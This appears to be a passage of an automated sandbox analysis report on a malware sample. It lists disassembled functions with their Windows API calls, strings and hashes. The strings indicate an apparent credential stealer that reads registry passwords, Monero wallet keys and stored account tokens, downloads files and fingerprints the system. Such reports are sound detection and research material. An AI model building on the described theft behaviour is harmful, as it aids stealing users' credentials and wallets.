                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: f2906ed3f7b199a37f13284251a9dc1ad1767ef6dd5c94b540d0d5c79259a6b5
                                    • Instruction ID: e485f15f8fff3e936665d917b826eda8acba727c94f2776a08e09e31f4fae675
                                    • Opcode Fuzzy Hash: f2906ed3f7b199a37f13284251a9dc1ad1767ef6dd5c94b540d0d5c79259a6b5
                                    • Instruction Fuzzy Hash: 83314B71900109DBDB04EBE4DC85EEF7379BB89701B144519F102A72A1EF34A946CB62
                                    Function 009460A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                    • InternetOpenA.WININET(00960DF7,00000001,00000000,00000000,00000000), ref: 0094610F
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 00946147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0094618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009461B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 009461DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0094620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00946249
                                    • InternetCloseHandle.WININET(?), ref: 00946253
                                    • InternetCloseHandle.WININET(00000000), ref: 00946260
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: bf32fed0ec004b03e6e79da7941499ea375ae1705e7ced5542430eca6732adaf
                                    • Instruction ID: e5b7efde2e318d082ad448b8290de54fe42fd725c3c885c3a34f76610548591b
                                    • Opcode Fuzzy Hash: bf32fed0ec004b03e6e79da7941499ea375ae1705e7ced5542430eca6732adaf
                                    • Instruction Fuzzy Hash: 5E5170B1900218ABEB20DFA0DC45FEE77B8FB44701F108599B605A71D1DBB46E89CF96
                                    Function 009472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0094733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009473B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0094740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00947452
                                    • HeapFree.KERNEL32(00000000), ref: 00947459
                                    • task.LIBCPMTD ref: 00947555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: b4258d09b90794c749f6a3e57399fa13bbb00124b4d8f1d581e39669e7e8b16d
                                    • Instruction ID: 9731b12e4086ae57804c57c80ad53572ef5eb70857fe3be648c6d17f8ca7f038
                                    • Opcode Fuzzy Hash: b4258d09b90794c749f6a3e57399fa13bbb00124b4d8f1d581e39669e7e8b16d
                                    • Instruction Fuzzy Hash: 046119B591426C9BDB24DB50CC55FEAB7B8BF88300F0085E9E649A6141DBB05BC9CFA1
                                    Function 0094BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    • lstrlen.KERNEL32(00000000), ref: 0094BC9F
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0094BCCD
                                    • lstrlen.KERNEL32(00000000), ref: 0094BDA5
                                    • lstrlen.KERNEL32(00000000), ref: 0094BDB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 28e11473b8019a874cbb81ad372297c3fbc83fcd01fa83997c50b93d5e7d75f3
                                    • Instruction ID: 2db118deb4910516b37c8f39ea040fd7176de19e09cc400df7d7d54878480cf4
                                    • Opcode Fuzzy Hash: 28e11473b8019a874cbb81ad372297c3fbc83fcd01fa83997c50b93d5e7d75f3
                                    • Instruction Fuzzy Hash: D0B13E719101189BDB04FBA1DC96FEE7338BF94301F444259F906A71A1EF346A4DCBAA
                                    Function 00956770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 4e399b7b5e2fae38d5539098cf7d36e233ceb545744ab1aa2412fc8f7c643289
                                    • Instruction ID: acb9767d3e5abf2b5e029b8faebfb547a12015ade630fefdf7fa9858263db58f
                                    • Opcode Fuzzy Hash: 4e399b7b5e2fae38d5539098cf7d36e233ceb545744ab1aa2412fc8f7c643289
                                    • Instruction Fuzzy Hash: BFF05E34908209EFE3449FE1E90972CBB70FB08703F04019AE609872A0DA785F41EB96
                                    Function 00944FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00944FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00944FD1
                                    • InternetOpenA.WININET(00960DDF,00000000,00000000,00000000,00000000), ref: 00944FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00945011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00945041
                                    • InternetCloseHandle.WININET(?), ref: 009450B9
                                    • InternetCloseHandle.WININET(?), ref: 009450C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 3ec19255a353ece7e537f118e6e0056689388b5aa72c1d4908c14d1e3cc5144e
                                    • Instruction ID: 4e426964d76d5ead6e82a1d49c6445e04dff0d161d6fd49914a3f2a26059cba6
                                    • Opcode Fuzzy Hash: 3ec19255a353ece7e537f118e6e0056689388b5aa72c1d4908c14d1e3cc5144e
                                    • Instruction Fuzzy Hash: B33106B4A00218ABDB20CF94DC85BDDB7B4EB48704F5081D9EB09A7291DB746E85CF99
                                    Function 00958100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015EDB20,00000000,?,00960E2C,00000000,?,00000000), ref: 00958130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00958137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00958158
                                    • wsprintfA.USER32 ref: 009581AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 26a46ecce49cee3d3e81fc5e7fe1be2d8667a5fae2427e1a9a5d8ca3362e2d83
                                    • Instruction ID: c85054cc9061724b37bddece771a34dac937c4e59322acaff86ab6c538a0914d
                                    • Opcode Fuzzy Hash: 26a46ecce49cee3d3e81fc5e7fe1be2d8667a5fae2427e1a9a5d8ca3362e2d83
                                    • Instruction Fuzzy Hash: 2E212EB1E44218ABEB10DFD5CC49FAFB7B8FB44B15F104509F605BB280DB7859058BA5
                                    Function 009583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00958426
                                    • wsprintfA.USER32 ref: 00958459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0095847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0095848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00958499
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,015EDB50,00000000,000F003F,?,00000400), ref: 009584EC
                                    • lstrlen.KERNEL32(?), ref: 00958501
                                    • RegQueryValueExA.ADVAPI32(00000000,015EDCA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00960B34), ref: 00958599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00958608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0095861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: ac7c45338cf9ee90e58144350067d9abc152e368cad18333dd35747fe5be8cf8
                                    • Instruction ID: cee412f3465483a6e982909fcc4bfac39a92aa6511298420ca5609279d29297f
                                    • Opcode Fuzzy Hash: ac7c45338cf9ee90e58144350067d9abc152e368cad18333dd35747fe5be8cf8
                                    • Instruction Fuzzy Hash: 07211BB19102189BEB24DB54DC85FE9B3B8FB48701F00C5D9E609A7190DF75AA85CFE4
                                    Function 00957690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009576A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 009576AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,015DB7A8,00000000,00020119,00000000), ref: 009576DD
                                    • RegQueryValueExA.ADVAPI32(00000000,015EDE08,00000000,00000000,?,000000FF), ref: 009576FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00957708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: f432a3ee74bab800d78637fd3a8a2cb13f1e9045fb69fce16e9af016deadd886
                                    • Instruction ID: 488c5aa5f6a8493d79c3f246e6c9d290610a2f861bb1bd4a581d494b0af3f713
                                    • Opcode Fuzzy Hash: f432a3ee74bab800d78637fd3a8a2cb13f1e9045fb69fce16e9af016deadd886
                                    • Instruction Fuzzy Hash: 91014FB5A04304BBEB00DBE5EC49F6AB7BCEB48701F104455FE04972A0EA749A04CB61
                                    Function 00957720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,015DB7A8,00000000,00020119,009576B9), ref: 0095775B
                                    • RegQueryValueExA.ADVAPI32(009576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0095777A
                                    • RegCloseKey.ADVAPI32(009576B9), ref: 00957784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
